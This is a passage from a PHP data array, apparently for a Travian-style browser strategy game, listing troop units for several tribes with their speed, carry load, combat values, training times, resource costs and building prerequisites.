'pre_requests' => array( '20' => 5, '22' => 5 )


'6'=> array(

'for_tribe_id' => 1, 'velocity' => 10, 'carry_load' => 70, 'crop_consumption' => 4, 'attack_value' => 180, 'defense_infantry' => 80, 'defense_cavalry' => 105, 'is_cavalry' => TRUE, 

'gold_needed'=> 2,

'research_time_consume' => 15000,

'training_time_consume' => 4400,

'trainer_building' => array( 20,30 ),

'research_resources' => array( '1' => 3400, '2' => 2660, '3' => 6600, '4' => 1240 ),

'training_resources'   => array( '1' => 550, '2' => 640, '3' => 800, '4' => 180 ),

'pre_requests' => array( '20' => 10, '22' => 5 )


'7'=> array(

'for_tribe_id' => 1, 'velocity' => 4, 'carry_load' => 0, 'crop_consumption' => 3, 'attack_value' => 60, 'defense_infantry' => 30, 'defense_cavalry' => 75, 'is_cavalry' => FALSE, 

'gold_needed'=> 3,

'research_time_consume' => 15600,

'training_time_consume' => 4600,

'trainer_building' => array( 21 ),

'research_resources' => array( '1' => 5500, '2' => 1540, '3' => 4200, '4' => 580 ),

'training_resources'   => array( '1' => 900, '2' => 360, '3' => 500, '4' => 70 ),

'pre_requests' => array( '22' => 10, '21' => 1 )


'8'=> array(

'for_tribe_id' => 1, 'velocity' => 3, 'carry_load' => 0, 'crop_consumption' => 6, 'attack_value' => 75, 'defense_infantry' => 60, 'defense_cavalry' => 10, 'is_cavalry' => FALSE, 

'gold_needed'=> 3,

'research_time_consume' => 28800,

'training_time_consume' => 9000,

'trainer_building' => array( 21 ),

'research_resources' => array( '1' => 5800, '2' => 5500, '3' => 5000, '4' => 700 ),

'training_resources'   => array( '1' => 950, '2' => 1350, '3' => 600, '4' => 90 ),

'pre_requests' => array( '21' => 10, '22' => 15 )


'9'=> array(

'for_tribe_id' => 1, 'velocity' => 4, 'carry_load' => 0, 'crop_consumption' => 5, 'attack_value' => 50, 'defense_infantry' => 40, 'defense_cavalry' => 30, 'is_cavalry' => FALSE, 

'gold_needed'=> 0,

'research_time_consume' => 24475,

'training_time_consume' => 90700,

'trainer_building' => array( 25,26 ),

'research_resources' => array( '1' => 15880, '2' => 13800, '3' => 36400, '4' => 22660 ),

'training_resources'   => array( '1' => 30750, '2' =>27200, '3' => 45000, '4' => 37500 ),

'pre_requests' => array( '16' => 10, '22' => 20 )


'10'=> array(

'for_tribe_id' => 1, 'velocity' => 5, 'carry_load' => 3000, 'crop_consumption' => 1, 'attack_value' => 0, 'defense_infantry' => 80, 'defense_cavalry' => 80, 'is_cavalry' => FALSE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 26900,

'trainer_building' => array( 25,26 ),

'research_resources' => array(),

'training_resources'   => array( '1' => 5800, '2' => 5300, '3' => 7200, '4' => 5500 ),

'pre_requests' => array(  ),

'help_pre_requests' => array( '26|25' => 10 )


'11'=> array(

'for_tribe_id' => 2, 'velocity' => 7, 'carry_load' => 60, 'crop_consumption' => 1, 'attack_value' => 40, 'defense_infantry' => 20, 'defense_cavalry' => 5, 'is_cavalry' => FALSE, 

'gold_needed'=> 1,

'research_time_consume' => 0,

'training_time_consume' => 900,

'trainer_building' => array( 19,29 ),

'research_resources' => array( ),

'training_resources'   => array( '1' => 95, '2' => 75, '3' => 40, '4' => 40 ),

'pre_requests' => array( )


'12'=> array(

'for_tribe_id' => 2, 'velocity' => 7, 'carry_load' => 40, 'crop_consumption' => 1, 'attack_value' => 10, 'defense_infantry' => 35, 'defense_cavalry' => 60, 'is_cavalry' => FALSE, 

'gold_needed'=> 1,

'research_time_consume' => 6000,

'training_time_consume' => 1400,

'trainer_building' => array( 19,29 ),

'research_resources' => array( '1' => 970, '2' => 380, '3' => 880, '4' => 400 ),

'training_resources'   => array( '1' => 145, '2' => 70, '3' => 85, '4' => 40 ),

'pre_requests' => array( '22' => 1 )


'13'=> array(

'for_tribe_id' => 2, 'velocity' => 6, 'carry_load' => 50, 'crop_consumption' => 1, 'attack_value' => 60, 'defense_infantry' => 30, 'defense_cavalry' => 30, 'is_cavalry' => FALSE, 

'gold_needed'=> 1,

'research_time_consume' => 6300,

'training_time_consume' => 1500,

'trainer_building' => array( 19,29 ),

'research_resources' => array( '1' => 880, '2' => 580, '3' => 1560, '4' => 580 ),

'training_resources'   => array( '1' => 130, '2' => 120, '3' => 170, '4' => 70 ),

'pre_requests' => array( '22' => 3, '12' => 1 )


'14'=> array(

'for_tribe_id' => 2, 'velocity' => 9, 'carry_load' => 0, 'crop_consumption' => 1, 'attack_value' => 0, 'defense_infantry' => 10, 'defense_cavalry' => 5, 'is_cavalry' => TRUE, 

'gold_needed'=> 1,

'research_time_consume' => 6000,

'training_time_consume' => 1400,

'trainer_building' => array( 19,29 ),

'research_resources' => array( '1' => 1060, '2' => 500, '3' => 600, '4' => 460 ),

'training_resources'   => array( '1' => 160, '2' => 100, '3' => 50, '4' => 50 ),

'pre_requests' => array( '22' => 1, '15' => 5 )


'15'=> array(

'for_tribe_id' => 2, 'velocity' => 10, 'carry_load' => 110, 'crop_consumption' => 2, 'attack_value' => 55, 'defense_infantry' => 100, 'defense_cavalry' => 40, 'is_cavalry' => TRUE, 

'gold_needed'=> 2,

'research_time_consume' => 10800,

'training_time_consume' => 3000,

'trainer_building' => array( 20,30 ),

'research_resources' => array( '1' => 2320, '2' => 1180, '3' => 2520, '4' => 610 ),

'training_resources'   => array( '1' => 370, '2' => 270, '3' => 290, '4' => 75 ),

'pre_requests' => array( '22' => 5, '20' => 3 )


'16'=> array(

'for_tribe_id' => 2, 'velocity' => 9, 'carry_load' => 80, 'crop_consumption' => 3, 'attack_value' => 150, 'defense_infantry' => 50, 'defense_cavalry' => 75, 'is_cavalry' => TRUE, 

'gold_needed'=> 2,

'research_time_consume' => 12900,

'training_time_consume' => 3700,

'trainer_building' => array( 20,30 ),

'research_resources' => array( '1' => 2800, '2' => 2160, '3' => 4040, '4' => 640 ),

'training_resources'   => array( '1' => 450, '2' => 515, '3' => 480, '4' => 80 ),

'pre_requests' => array( '20' => 10, '22' => 15 )


'17'=> array(

'for_tribe_id' => 2, 'velocity' => 4, 'carry_load' => 0, 'crop_consumption' => 3, 'attack_value' => 65, 'defense_infantry' => 30, 'defense_cavalry' => 80, 'is_cavalry' => FALSE, 

'gold_needed'=> 3,

'research_time_consume' => 14400,

'training_time_consume' => 4200,

'trainer_building' => array( 21 ),

'research_resources' => array( '1' => 6100, '2' => 1300, '3' => 3000, '4' => 580 ),

'training_resources'   => array( '1' => 1000, '2' => 300, '3' => 350, '4' => 70 ),

'pre_requests' => array( '22' => 10, '21' => 1 )


'18'=> array(

'for_tribe_id' => 2, 'velocity' => 3, 'carry_load' => 0, 'crop_consumption' => 6, 'attack_value' => 50, 'defense_infantry' => 60, 'defense_cavalry' => 10, 'is_cavalry' => FALSE, 

'gold_needed'=> 3,

'research_time_consume' => 28800,

'training_time_consume' => 9000,

'trainer_building' => array( 21 ),

'research_resources' => array( '1' => 5500, '2' => 4900, '3' => 5000, '4' => 520 ),

'training_resources'   => array( '1' => 900, '2' => 1200, '3' => 600, '4' => 60 ),

'pre_requests' => array( '21' => 10, '22' => 15 )


'19'=> array(

'for_tribe_id' => 2, 'velocity' => 4, 'carry_load' => 0, 'crop_consumption' => 4, 'attack_value' => 40, 'defense_infantry' => 60, 'defense_cavalry' => 40, 'is_cavalry' => FALSE, 

'gold_needed'=> 0,

'research_time_consume' => 19425,

'training_time_consume' => 70500,

'trainer_building' => array( 25,26 ),

'research_resources' => array( '1' => 18250, '2' => 13500, '3' => 20400, '4' => 16480 ),

'training_resources'   => array( '1' => 35500, '2' => 26600, '3' => 25000, '4' => 27200 ),

'pre_requests' => array( '16' => 5, '22' => 20 )


'20'=> array(

'for_tribe_id' => 2, 'velocity' => 5, 'carry_load' => 3000, 'crop_consumption' => 1, 'attack_value' => 10, 'defense_infantry' => 80, 'defense_cavalry' => 80, 'is_cavalry' => FALSE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 31000,

'trainer_building' => array( 25,26 ),

'research_resources' => array(),

'training_resources'   => array( '1' => 7200, '2' => 5500, '3' => 5800, '4' => 6500 ),

'pre_requests' => array(  ),

'help_pre_requests' => array( '26|25' => 10 )


'21'=> array(

'for_tribe_id' => 3, 'velocity' => 7, 'carry_load' => 30, 'crop_consumption' => 1, 'attack_value' => 15, 'defense_infantry' => 40, 'defense_cavalry' => 50, 'is_cavalry' => FALSE, 

'gold_needed'=> 1,

'research_time_consume' => 0,

'training_time_consume' => 1300,

'trainer_building' => array( 19,29 ),

'research_resources' => array( ),

'training_resources'   => array( '1' => 100, '2' => 130, '3' => 55, '4' => 30 ),

'pre_requests' => array( )


'22'=> array(

'for_tribe_id' => 3, 'velocity' => 6, 'carry_load' => 45, 'crop_consumption' => 1, 'attack_value' => 65, 'defense_infantry' => 35, 'defense_cavalry' => 20, 'is_cavalry' => FALSE, 

'gold_needed'=> 1,

'research_time_consume' => 7200,

'training_time_consume' => 1800,

'trainer_building' => array( 19,29 ),

'research_resources' => array( '1' => 940, '2' => 700, '3' => 1680, '4' => 520 ),

'training_resources'   => array( '1' => 140, '2' => 150, '3' => 185, '4' => 60 ),

'pre_requests' => array( '22' => 1, '12' => 1 )


'23'=> array(

'for_tribe_id' => 3, 'velocity' => 17, 'carry_load' => 0, 'crop_consumption' => 2, 'attack_value' => 0, 'defense_infantry' => 20, 'defense_cavalry' => 10, 'is_cavalry' => TRUE, 

'gold_needed'=> 1,

'research_time_consume' => 6900,

'training_time_consume' => 1700,

'trainer_building' => array( 20,30 ),

'research_resources' => array( '1' => 1120, '2' => 700, '3' => 360, '4' => 400 ),

'training_resources'   => array( '1' => 170, '2' => 150, '3' => 20, '4' => 40 ),

'pre_requests' => array( '22' => 5, '20' => 1 )


'24'=> array(

'for_tribe_id' => 3, 'velocity' => 19, 'carry_load' => 75, 'crop_consumption' => 2, 'attack_value' => 90, 'defense_infantry' => 25, 'defense_cavalry' => 40, 'is_cavalry' => TRUE, 

'gold_needed'=> 1,

'research_time_consume' => 11100,

'training_time_consume' => 3100,

'trainer_building' => array( 20,30 ),

'research_resources' => array( '1' => 2200, '2' => 1900, '3' => 2040, '4' => 520 ),

'training_resources'   => array( '1' => 350, '2' => 450, '3' => 230, '4' => 60 ),

'pre_requests' => array( '20' => 3, '22' => 5 )


'25'=> array(

'for_tribe_id' => 3, 'velocity' => 16, 'carry_load' => 35, 'crop_consumption' => 2, 'attack_value' => 45, 'defense_infantry' => 115, 'defense_cavalry' => 55, 'is_cavalry' => TRUE, 

'gold_needed'=> 2,

'research_time_consume' => 11400,

'training_time_consume' => 3200,

'trainer_building' => array( 20,30 ),

'research_resources' => array( '1' => 2260, '2' => 1420, '3' => 2440, '4' => 880 ),

'training_resources'   => array( '1' => 360, '2' => 330, '3' => 280, '4' => 120 ),

'pre_requests' => array( '20' => 5, '22' => 5 )


'26'=> array(

'for_tribe_id' => 3, 'velocity' => 13, 'carry_load' => 65, 'crop_consumption' => 3, 'attack_value' => 140, 'defense_infantry' => 50, 'defense_cavalry' => 165, 'is_cavalry' => TRUE, 

'gold_needed'=> 2,

'research_time_consume' => 13500,

'training_time_consume' => 3900,

'trainer_building' => array( 20,30 ),

'research_resources' => array( '1' => 3100, '2' => 2580, '3' => 5600, '4' => 1180 ),

'training_resources'   => array( '1' => 500, '2' => 620, '3' => 675, '4' => 170 ),

'pre_requests' => array( '20' => 10, '22' => 15 )


'27'=> array(

'for_tribe_id' => 3, 'velocity' => 4, 'carry_load' => 0, 'crop_consumption' => 3, 'attack_value' => 50, 'defense_infantry' => 30, 'defense_cavalry' => 105, 'is_cavalry' => FALSE, 

'gold_needed'=> 3,

'research_time_consume' => 16800,

'training_time_consume' => 5000,

'trainer_building' => array( 21 ),

'research_resources' => array( '1' => 5800, '2' => 2320, '3' => 2840, '4' => 610 ),

'training_resources'   => array( '1' => 950, '2' => 555, '3' => 330, '4' => 75 ),

'pre_requests' => array( '22' => 10, '21' => 1 )


'28'=> array(

'for_tribe_id' => 3, 'velocity' => 3, 'carry_load' => 0, 'crop_consumption' => 6, 'attack_value' => 70, 'defense_infantry' => 45, 'defense_cavalry' => 10, 'is_cavalry' => FALSE, 

'gold_needed'=> 3,

'research_time_consume' => 28800,

'training_time_consume' => 9000,

'trainer_building' => array( 21 ),

'research_resources' => array( '1' => 5860, '2' => 5900, '3' => 5240, '4' => 700 ),

'training_resources'   => array( '1' => 960, '2' => 1450, '3' => 630, '4' => 90 ),

'pre_requests' => array( '21' => 10, '22' => 15 )


'29'=> array(

'for_tribe_id' => 3, 'velocity' => 5, 'carry_load' => 0, 'crop_consumption' => 4, 'attack_value' => 40, 'defense_infantry' => 50, 'defense_cavalry' => 50, 'is_cavalry' => FALSE, 

'gold_needed'=> 0,

'research_time_consume' => 24475,

'training_time_consume' => 90700,

'trainer_building' => array( 25,26 ),

'research_resources' => array( '1' => 15880, '2' => 22900, '3' => 25200, '4' => 22660 ),

'training_resources'   => array( '1' => 30750, '2' => 45400, '3' => 31000, '4' => 37500 ),

'pre_requests' => array( '16' => 10, '22' => 20 )


'30'=> array(

'for_tribe_id' => 3, 'velocity' => 5, 'carry_load' => 3000, 'crop_consumption' => 1, 'attack_value' => 0, 'defense_infantry' => 80, 'defense_cavalry' => 80, 'is_cavalry' => FALSE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 22700,

'trainer_building' => array( 25,26 ),

'research_resources' => array(),

'training_resources'   => array( '1' => 5500, '2' => 7000, '3' => 5300, '4' => 4900 ),

'pre_requests' => array(  ),

'help_pre_requests' => array( '26|25' => 10 )


'31'=> array(

'for_tribe_id' => 4, 'velocity' => 20, 'carry_load' => 0, 'crop_consumption' => 1, 'attack_value' => 10, 'defense_infantry' => 25, 'defense_cavalry' => 20, 'is_cavalry' => TRUE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 0,

'trainer_building' => array(  ),

'research_resources' => array( ),

'training_resources'   => array( ),

'pre_requests' => array( )


'32'=> array(

'for_tribe_id' => 4, 'velocity' => 20, 'carry_load' => 0, 'crop_consumption' => 1, 'attack_value' => 20, 'defense_infantry' => 35, 'defense_cavalry' => 40, 'is_cavalry' => TRUE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 0,

'trainer_building' => array(  ),

'research_resources' => array( ),

'training_resources'   => array( ),

'pre_requests' => array( )


'33'=> array(

'for_tribe_id' => 4, 'velocity' => 20, 'carry_load' => 0, 'crop_consumption' => 1, 'attack_value' => 60, 'defense_infantry' => 40, 'defense_cavalry' => 60, 'is_cavalry' => TRUE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 0,

'trainer_building' => array(  ),

'research_resources' => array( ),

'training_resources'   => array( ),

'pre_requests' => array( )


'34'=> array(

'for_tribe_id' => 4, 'velocity' => 20, 'carry_load' => 0, 'crop_consumption' => 1, 'attack_value' => 80, 'defense_infantry' => 66, 'defense_cavalry' => 50, 'is_cavalry' => TRUE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 0,

'trainer_building' => array(  ),

'research_resources' => array( ),

'training_resources'   => array( ),

'pre_requests' => array( )


'35'=> array(

'for_tribe_id' => 4, 'velocity' => 20, 'carry_load' => 0, 'crop_consumption' => 2, 'attack_value' => 50, 'defense_infantry' => 70, 'defense_cavalry' => 33, 'is_cavalry' => TRUE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 0,

'trainer_building' => array(  ),

'research_resources' => array( ),

'training_resources'   => array( ),

'pre_requests' => array( )


'36'=> array(

'for_tribe_id' => 4, 'velocity' => 20, 'carry_load' => 0, 'crop_consumption' => 2, 'attack_value' => 100, 'defense_infantry' => 80, 'defense_cavalry' => 70, 'is_cavalry' => TRUE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 0,

'trainer_building' => array(  ),

'research_resources' => array( ),

'training_resources'   => array( ),

'pre_requests' => array( )


'37'=> array(

'for_tribe_id' => 4, 'velocity' => 20, 'carry_load' => 0, 'crop_consumption' => 3, 'attack_value' => 250, 'defense_infantry' => 140, 'defense_cavalry' => 200, 'is_cavalry' => TRUE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 0,

'trainer_building' => array(  ),

'research_resources' => array( ),

'training_resources'   => array( ),

'pre_requests' => array( )


'38'=> array(

'for_tribe_id' => 4, 'velocity' => 20, 'carry_load' => 0, 'crop_consumption' => 3, 'attack_value' => 450, 'defense_infantry' => 380, 'defense_cavalry' => 240, 'is_cavalry' => TRUE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 0,

'trainer_building' => array(  ),

'research_resources' => array( ),

'training_resources'   => array( ),

'pre_requests' => array( )


'39'=> array(

'for_tribe_id' => 4, 'velocity' => 20, 'carry_load' => 0, 'crop_consumption' => 3, 'attack_value' => 200, 'defense_infantry' => 170, 'defense_cavalry' => 250, 'is_cavalry' => TRUE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 0,

'trainer_building' => array(  ),

'research_resources' => array( ),

'training_resources'   => array( ),

'pre_requests' => array( )


'40'=> array(

'for_tribe_id' => 4, 'velocity' => 20, 'carry_load' => 0, 'crop_consumption' => 5, 'attack_value' => 600, 'defense_infantry' => 440, 'defense_cavalry' => 520, 'is_cavalry' => TRUE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 0,

'trainer_building' => array(  ),

'research_resources' => array( ),

'training_resources'   => array( ),

'pre_requests' => array( )


'41'=> array(

'for_tribe_id' => 5, 'velocity' => 30, 'carry_load' => 0, 'crop_consumption' => 0, 'attack_value' => 100, 'defense_infantry' => 110, 'defense_cavalry' => 310, 'is_cavalry' => FALSE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 0,

'trainer_building' => array(  ),

'research_resources' => array( ),

'training_resources'   => array( ),

'pre_requests' => array( )


'42'=> array(

'for_tribe_id' => 5, 'velocity' => 40, 'carry_load' => 0, 'crop_consumption' => 0, 'attack_value' => 120, 'defense_infantry' => 220, 'defense_cavalry' => 330, 'is_cavalry' => FALSE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 0,

'trainer_building' => array(  ),

'research_resources' => array( ),

'training_resources'   => array( ),

'pre_requests' => array( )


'43'=> array(

'for_tribe_id' => 5, 'velocity' => 50, 'carry_load' => 0, 'crop_consumption' => 0, 'attack_value' => 100, 'defense_infantry' => 310, 'defense_cavalry' => 170, 'is_cavalry' => FALSE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 0,

'trainer_building' => array(  ),

'research_resources' => array( ),

'training_resources'   => array( ),

'pre_requests' => array( )


'44'=> array(

'for_tribe_id' => 5, 'velocity' => 60, 'carry_load' => 0, 'crop_consumption' => 0, 'attack_value' => 200, 'defense_infantry' => 200, 'defense_cavalry' => 200, 'is_cavalry' => TRUE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 0,

'trainer_building' => array(  ),

'research_resources' => array( ),

'training_resources'   => array( ),

'pre_requests' => array( )


'45'=> array(

'for_tribe_id' => 5, 'velocity' => 70, 'carry_load' => 0, 'crop_consumption' => 0, 'attack_value' => 300, 'defense_infantry' => 430, 'defense_cavalry' => 210, 'is_cavalry' => TRUE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 0,

'trainer_building' => array(  ),

'research_resources' => array( ),

'training_resources'   => array( ),

'pre_requests' => array( )


'46'=> array(

'for_tribe_id' => 5, 'velocity' => 30, 'carry_load' => 0, 'crop_consumption' => 0, 'attack_value' => 120, 'defense_infantry' => 210, 'defense_cavalry' => 300, 'is_cavalry' => TRUE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 0,

'trainer_building' => array(  ),

'research_resources' => array( ),

'training_resources'   => array( ),

'pre_requests' => array( )


'47'=> array(

'for_tribe_id' => 5, 'velocity' => 30, 'carry_load' => 0, 'crop_consumption' => 0, 'attack_value' => 190, 'defense_infantry' => 210, 'defense_cavalry' => 100, 'is_cavalry' => FALSE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 0,

'trainer_building' => array(  ),

'research_resources' => array( ),

'training_resources'   => array( ),

'pre_requests' => array( )


'48'=> array(

'for_tribe_id' => 5, 'velocity' => 25, 'carry_load' => 0, 'crop_consumption' => 0, 'attack_value' => 100, 'defense_infantry' => 70, 'defense_cavalry' => 80, 'is_cavalry' => FALSE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 0,

'trainer_building' => array(  ),

'research_resources' => array( ),

'training_resources'   => array( ),

'pre_requests' => array( )


'49'=> array(

'for_tribe_id' => 5, 'velocity' => 50, 'carry_load' => 0, 'crop_consumption' => 0, 'attack_value' => 90, 'defense_infantry' => 120, 'defense_cavalry' => 130, 'is_cavalry' => FALSE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 0,

'trainer_building' => array(  ),

'research_resources' => array( ),

'training_resources'   => array( ),

'pre_requests' => array( )


'50'=> array(

'for_tribe_id' => 5, 'velocity' => 40, 'carry_load' => 0, 'crop_consumption' => 0, 'attack_value' => 70, 'defense_infantry' => 100, 'defense_cavalry' => 120, 'is_cavalry' => FALSE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 0,

'trainer_building' => array(  ),

'research_resources' => array( ),

'training_resources'   => array( ),

'pre_requests' => array( )


'51'=> array(

'for_tribe_id' => 6, 'velocity' => 6, 'carry_load' => 40, 'crop_consumption' => 1, 'attack_value' => 40, 'defense_infantry' => 35, 'defense_cavalry' => 50, 'is_cavalry' => FALSE, 

'gold_needed'=> 1,

'research_time_consume' => 0,

'training_time_consume' => 2000,

'trainer_building' => array( 19,29 ),

'research_resources' => array( ),

'training_resources'   => array( '1' => 120, '2' => 100, '3' => 180, '4' => 40 ),

'pre_requests' => array( )


'52'=> array(

'for_tribe_id' => 6, 'velocity' => 6, 'carry_load' => 50, 'crop_consumption' => 1, 'attack_value' => 30, 'defense_infantry' => 70, 'defense_cavalry' => 50, 'is_cavalry' => FALSE, 

'gold_needed'=> 1,

'research_time_consume' => 6300,

'training_time_consume' => 1500,

'trainer_building' => array( 19,29 ),

'research_resources' => array( '1' => 880, '2' => 580, '3' => 1560, '4' => 580 ),

'training_resources'   => array( '1' => 130, '2' => 120, '3' => 170, '4' => 70 ),

'pre_requests' => array( '22' => 3, '12' => 1 )


'53'=> array(

'for_tribe_id' => 6, 'velocity' => 7, 'carry_load' => 50, 'crop_consumption' => 1, 'attack_value' => 70, 'defense_infantry' => 40, 'defense_cavalry' => 25, 'is_cavalry' => FALSE, 

'gold_needed'=> 1,

'research_time_consume' => 9000,

'training_time_consume' => 2400,

'trainer_building' => array( 19,29 ),

'research_resources' => array( '1' => 1000, '2' => 740, '3' => 1880, '4' => 640 ),

'training_resources'   => array( '1' => 150, '2' => 160, '3' => 210, '4' => 80 ),

'pre_requests' => array( '22' => 5, '12' => 1 )


'54'=> array(

'for_tribe_id' => 6, 'velocity' => 20, 'carry_load' => 0, 'crop_consumption' => 2, 'attack_value' => 0, 'defense_infantry' => 10, 'defense_cavalry' => 0, 'is_cavalry' => TRUE, 

'gold_needed'=> 1,

'research_time_consume' => 7000,

'training_time_consume' => 1360,

'trainer_building' => array( 19,29 ),

'research_resources' => array( '1' => 1060, '2' => 500, '3' => 600, '4' => 460 ),

'training_resources'   => array( '1' => 210, '2' => 240, '3' => 30, '4' => 60 ),

'pre_requests' => array( '22' => 1, '15' => 5 )


'55'=> array(

'for_tribe_id' => 6, 'velocity' => 9, 'carry_load' => 80, 'crop_consumption' => 3, 'attack_value' => 150, 'defense_infantry' => 50, 'defense_cavalry' => 75, 'is_cavalry' => TRUE, 

'gold_needed'=> 2,

'research_time_consume' => 12900,

'training_time_consume' => 3700,

'trainer_building' => array( 20,30 ),

'research_resources' => array( '1' => 2800, '2' => 2160, '3' => 4040, '4' => 640 ),

'training_resources'   => array( '1' => 450, '2' => 515, '3' => 480, '4' => 80 ),

'pre_requests' => array( '20' => 10, '22' => 15 )


'56'=> array(

'for_tribe_id' => 6, 'velocity' => 10, 'carry_load' => 65, 'crop_consumption' => 4, 'attack_value' => 170, 'defense_infantry' => 140, 'defense_cavalry' => 80, 'is_cavalry' => TRUE, 

'gold_needed'=> 2,

'research_time_consume' => 12900,

'training_time_consume' => 4120,

'trainer_building' => array( 20,30 ),

'research_resources' => array( '1' => 2800, '2' => 2160, '3' => 4040, '4' => 640 ),

'training_resources'   => array( '1' => 825, '2' => 960, '3' => 1200, '4' => 270 ),

'pre_requests' => array( '22' => 15, '20' => 10 )


'57'=> array(

'for_tribe_id' => 6, 'velocity' => 4, 'carry_load' => 0, 'crop_consumption' => 3, 'attack_value' => 60, 'defense_infantry' => 30, 'defense_cavalry' => 75, 'is_cavalry' => FALSE, 

'gold_needed'=> 3,

'research_time_consume' => 15600,

'training_time_consume' => 4600,

'trainer_building' => array( 21 ),

'research_resources' => array( '1' => 5500, '2' => 1540, '3' => 4200, '4' => 580 ),

'training_resources'   => array( '1' => 900, '2' => 360, '3' => 500, '4' => 70 ),

'pre_requests' => array( '22' => 10, '21' => 1 )


'58'=> array(

'for_tribe_id' => 6, 'velocity' => 3, 'carry_load' => 0, 'crop_consumption' => 6, 'attack_value' => 50, 'defense_infantry' => 60, 'defense_cavalry' => 10, 'is_cavalry' => FALSE, 

'gold_needed'=> 3,

'research_time_consume' => 28800,

'training_time_consume' => 9000,

'trainer_building' => array( 21 ),

'research_resources' => array( '1' => 5500, '2' => 4900, '3' => 5000, '4' => 520 ),

'training_resources'   => array( '1' => 900, '2' => 1200, '3' => 600, '4' => 60 ),

'pre_requests' => array( '21' => 10, '22' => 15 )


'59'=> array(

'for_tribe_id' => 6, 'velocity' => 4, 'carry_load' => 0, 'crop_consumption' => 5, 'attack_value' => 80, 'defense_infantry' => 50, 'defense_cavalry' => 50, 'is_cavalry' => FALSE, 

'gold_needed'=> 0,

'research_time_consume' => 19425,

'training_time_consume' => 94300,

'trainer_building' => array( 25,26 ),

'research_resources' => array( '1' => 18250, '2' => 13500, '3' => 20400, '4' => 16480 ),

'training_resources'   => array( '1' => 46125, '2' => 40800, '3' => 67500, '4' => 65250 ),

'pre_requests' => array( '16' => 10, '22' => 20 )


'60'=> array(

'for_tribe_id' => 6, 'velocity' => 5, 'carry_load' => 3000, 'crop_consumption' => 1, 'attack_value' => 30, 'defense_infantry' => 40, 'defense_cavalry' => 40, 'is_cavalry' => FALSE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 30500,

'trainer_building' => array( 25,26 ),

'research_resources' => array(),

'training_resources'   => array( '1' => 8700, '2' => 7950, '3' => 10800, '4' => 8250 ),

'pre_requests' => array(  ),

'help_pre_requests' => array( '26|25' => 10 )


'99'=> array(

'for_tribe_id' => -1 /* for all tribes */, 'velocity' => 0, 'carry_load' => 0, 'crop_consumption' => 0, 'attack_value' => 0, 'defense_infantry' => 0, 'defense_cavalry' => 0, 'is_cavalry' => NULL, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 210,

'trainer_building' => array( 36 ),

'research_resources' => array( ),

'training_resources'   => array( '1' => 20, '2' => 30, '3' => 10, '4' => 20 ),

'pre_requests' => array( )


'100'=> array(

'for_tribe_id' => 7, 'velocity' => 6, 'carry_load' => 50, 'crop_consumption' => 1, 'attack_value' => 20, 'defense_infantry' => 35, 'defense_cavalry' => 50, 'is_cavalry' => FALSE, 

'gold_needed'=> 1,

'research_time_consume' => 0,

'training_time_consume' => 1824,

'trainer_building' => array( 19,29 ),

'research_resources' => array( ),

'training_resources'   => array( '1' => 180, '2' => 150, '3' => 225, '4' => 45 ),

'pre_requests' => array(  )


'101'=> array(

'for_tribe_id' => 7, 'velocity' => 5, 'carry_load' => 45, 'crop_consumption' => 1, 'attack_value' => 65, 'defense_infantry' => 30, 'defense_cavalry' => 10, 'is_cavalry' => FALSE, 

'gold_needed'=> 1,

'research_time_consume' => 6000,

'training_time_consume' => 2000,

'trainer_building' => array( 19,29 ),

'research_resources' => array( '1' => 880, '2' => 580, '3' => 1560, '4' => 580 ),

'training_resources' => array( '1' => 150, '2' => 195, '3' => 240, '4' => 105 ),

'pre_requests' => array( '22' => 3, '12' => 1 )


'102'=> array(

'for_tribe_id' => 7, 'velocity' => 7, 'carry_load' => 50, 'crop_consumption' => 1, 'attack_value' => 100, 'defense_infantry' => 90, 'defense_cavalry' => 75, 'is_cavalry' => FALSE, 

'gold_needed'=> 1,

'research_time_consume' => 6300,

'training_time_consume' => 2160,

'trainer_building' => array( 19,29 ),

'research_resources' => array( '1' => 880, '2' => 580, '3' => 1560, '4' => 580 ),

'training_resources'   => array( '1' => 225, '2' => 240, '3' => 315, '4' => 120 ),

'pre_requests' => array( '22' => 10, '12' => 1 )


'103'=> array(

'for_tribe_id' => 7, 'velocity' => 20, 'carry_load' => 0, 'crop_consumption' => 2, 'attack_value' => 0, 'defense_infantry' => 10, 'defense_cavalry' => 0, 'is_cavalry' => TRUE, 

'gold_needed'=> 1,

'research_time_consume' => 7000,

'training_time_consume' => 1360,

'trainer_building' => array( 19,29 ),

'research_resources' => array( '1' => 1060, '2' => 500, '3' => 600, '4' => 460 ),

'training_resources'   => array( '1' => 210, '2' => 240, '3' => 30, '4' => 60 ),

'pre_requests' => array( '22' => 1, '15' => 5 )


'104'=> array(

'for_tribe_id' => 7, 'velocity' => 14, 'carry_load' => 100, 'crop_consumption' => 3, 'attack_value' => 155, 'defense_infantry' => 80, 'defense_cavalry' => 50, 'is_cavalry' => TRUE, 

'gold_needed'=> 2,

